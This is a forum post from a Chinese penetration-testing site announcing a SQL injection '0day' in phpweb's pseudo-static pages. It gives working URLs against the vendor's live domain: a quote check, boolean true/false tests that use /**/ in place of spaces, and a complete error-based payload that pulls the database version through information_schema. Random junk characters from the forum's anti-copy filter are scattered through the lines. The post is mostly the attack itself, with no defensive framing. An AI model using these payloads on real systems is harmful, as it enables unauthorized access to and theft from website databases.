中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]

作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入6 x6 t, X4 Q- Q: U' j! G. l3 g( o
# c! j  c+ F3 c! c/ y4 Y. ]' M( M
主站:http://phpweb.net/+ l: Q( u6 b4 G/ }
加’检测:0 l3 `/ s8 W7 R( y

5 m/ w9 O: w) m) @- {" G6 R1 lhttp://www.phpweb.net/down/html/?772′.html5 z3 Q4 T9 T+ {( e" J

7 R% k2 a( \8 n7 e% I出错
* y0 b& U/ w; L+ k8 {存在注入。
2 \' X- \3 C0 n+ U不能用空格,只能用/*罗
$ m3 V5 L, a$ ]  ?3 @4 Ehttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
" W0 p- x1 t0 N5 z9 B% a+ k
% X* o( H' Z5 i0 e5 ^5 n3 Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.' e- c. Q. B  B4 Z# x' V
爆数据库版本:
1 A/ j) S$ Q2 J1 C1 z1 ]! ` 0 l( C( Q/ H1 @# c* b: N; C
?: G  _" W" ]4 U! |" Y# G
1) l8 D/ M+ O. z
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html% k8 m, H: T* {* m  ^. x3 W
更新日期: 2013-01-03 13:39:50        ( l" k  {4 r: s1 f3 N: K$ \





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2